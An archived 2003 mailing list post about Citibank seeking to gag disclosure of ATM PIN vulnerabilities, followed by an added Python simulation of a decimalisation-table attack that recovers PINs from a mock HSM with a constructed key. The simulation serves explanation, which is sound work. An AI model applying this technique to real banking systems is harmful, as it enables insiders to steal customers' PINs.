Interesting People mailing list archives

Citibank tries to gag crypto bug disclosure


From: Dave Farber <dave () farber net>
Date: Thu, 20 Feb 2003 07:34:41 -0500


------ Forwarded Message
From: Brian Randell <Brian.Randell () newcastle ac uk>
Date: Thu, 20 Feb 2003 12:15:09 +0000
To: farber () cis upenn edu
Subject: Fwd: [open-source] Citibank tries to gag crypto bug disclosure

Dave:

I assume you've seen this, but just in case ...

cheers

Brian

PS I was at Monday's meeting at Microsoft Research in Cambridge, in
honour of Roger Needham, at which Ross Anderson gave an excellent talk
about this work.



To: open-source () csl sri com
Subject: [open-source] Citibank tries to gag crypto bug disclosure
Date: Thu, 20 Feb 2003 09:58:47 +0000
From: Ross Anderson <Ross.Anderson () cl cam ac uk>
Sender: open-source-owner () csl sri com
Reply-To: Ross Anderson <Ross.Anderson () cl cam ac uk>


Citibank is trying to get an order in the High Court today gagging
public disclosure of crypto vulnerabilities:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf

I have written to the judge opposing the order:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf

The background is that my student Mike Bond has discovered some really
horrendous vulnerabilities in the cryptographic equipment commonly
used to protect the PINs used to identify customers to cash machines:

    http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf

These vulnerabilities mean that bank insiders can almost trivially
find out the PINs of any or all customers. The discoveries happened
while Mike and I were working as expert witnesses on a `phantom
withdrawal' case.

The vulnerabilities are also scientifically interesting:

    http://cryptome.org/pacc.htm

For the last couple of years or so there has been a rising tide of
phantoms. I get emails with increasing frequency from people all over
the world whose banks have debited them for ATM withdrawals that they
deny making. Banks in many countries simply claim that their systems
are secure and so the customers must be responsible. It now looks like
some of these vulnerabilities have also been discovered by the bad
guys. Our courts and regulators should make the banks fix their
systems, rather than just lying about security and dumping the costs
on the customers.

Curiously enough, Citi was also the bank in the case that set US law
on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope
that's an omen, if not a precedent ...

Ross Anderson


-- 
School of Computing Science, University of Newcastle, Newcastle upon Tyne,
NE1 7RU, UK
EMAIL = Brian.Randell () newcastle ac uk   PHONE = +44 191 222 7923
FAX = +44 191 222 8232  URL = http://www.cs.ncl.ac.uk/~brian.randell/


------ End of Forwarded Message
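The message above says only that the cited report (UCAM-CL-TR-560) found vulnerabilities in PIN-protecting HSMs that let an insider recover PINs; it does not describe the mechanism. The following is an added illustration, not code from the thread or from the report's authors, of the attack class that report covers: a decimalisation table attack on an IBM 3624-style PIN verification function, where the caller supplies the table used to turn the encrypted account number into the "natural" PIN. Everything below is a simulation with stated assumptions: HMAC-SHA256 stands in for the DES encryption of the account number, the PIN derivation key and the PANs are constructed sample values, and the trial PIN is passed in clear rather than as an encrypted PIN block (the real API takes a PIN block, so an attacker also needs a way to obtain blocks for chosen PINs). None of those details come from the page.

```python
import hashlib
import hmac
import itertools

# Standard decimalisation table: hex digit value x maps to STD_DECTAB[x].
STD_DECTAB = "0123456789012345"


def add_offset(natural_pin: str, offset: str) -> str:
    """Customer PIN = natural PIN + offset, digit-wise mod 10 (IBM 3624 offset method)."""
    return "".join(str((int(a) + int(b)) % 10) for a, b in zip(natural_pin, offset))


def binarised_table(digit: int) -> str:
    """Attacker table: hex values the standard table sends to `digit` become '1', the rest '0'."""
    return "".join("1" if STD_DECTAB[x] == str(digit) else "0" for x in range(16))


class PinHsm:
    """Simulated 3624-style PIN verification module.

    The PIN derivation key never leaves the object and callers only get a
    yes/no answer from verify().  As in the real API, the caller supplies
    the decimalisation table, which is what the attack exploits.
    """

    def __init__(self, pin_derivation_key: bytes):
        self._pdk = pin_derivation_key
        self.calls = 0  # number of verifications the caller has made

    def _natural_pin(self, pan: str, dectab: str) -> str:
        # Stand-in for DES encryption of the account number under the PDK
        # (assumption of this example; the real scheme uses DES).
        digest = hmac.new(self._pdk, pan.encode(), hashlib.sha256).hexdigest()
        return "".join(dectab[int(c, 16)] for c in digest[:4])

    def verify(self, pan: str, dectab: str, offset: str, trial_pin: str) -> bool:
        # Real function takes an encrypted PIN block; clear text here for brevity.
        self.calls += 1
        return add_offset(self._natural_pin(pan, dectab), offset) == trial_pin

    def true_natural_pin(self, pan: str) -> str:
        """Ground truth for checking the attack; a real HSM exposes nothing like this."""
        return self._natural_pin(pan, STD_DECTAB)


def crack_natural_pin(hsm: PinHsm, pan: str) -> str:
    """Recover the 4-digit natural PIN using verify() only, with offset fixed to 0000."""
    pin = ["?"] * 4
    for digit in range(10):
        table = binarised_table(digit)
        # Under this table the decimalised PIN is all zeros iff `digit` does not occur.
        if hsm.verify(pan, table, "0000", "0000"):
            continue
        # `digit` occurs somewhere: try every pattern of 1s (at most 15 calls) to locate it.
        for r in range(1, 5):
            for positions in itertools.combinations(range(4), r):
                trial = "".join("1" if p in positions else "0" for p in range(4))
                if hsm.verify(pan, table, "0000", trial):
                    for p in positions:
                        pin[p] = str(digit)
                    break
            else:
                continue
            break
    return "".join(pin)


def demo(pans):
    """Crack the natural PIN for each constructed PAN; return (pan, pin, correct?, oracle calls)."""
    hsm = PinHsm(b"constructed-example-pin-derivation-key")  # constructed key
    results = []
    for pan in pans:
        before = hsm.calls
        cracked = crack_natural_pin(hsm, pan)
        results.append((pan, cracked, cracked == hsm.true_natural_pin(pan), hsm.calls - before))
    return results


if __name__ == "__main__":
    # Constructed sample PANs, not real account numbers.
    for pan, pin, ok, cost in demo(["4000123456789010", "4000123456789028", "5100000000000000"]):
        print(f"PAN {pan}: natural PIN {pin} ({'correct' if ok else 'WRONG'}) in {cost} verify() calls")
```

The point of the simulation is the cost: phase one is exactly 10 verify() calls, and locating each digit that is present takes at most 15 more, so the whole natural PIN falls in no more than 70 oracle calls and usually far fewer, with no knowledge of the key. The customer's actual PIN is then add_offset() of that value with the offset, which in the 3624 scheme is stored in the clear where an insider can read it.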

Archives at: http://www.interesting-people.org/archives/interesting-people/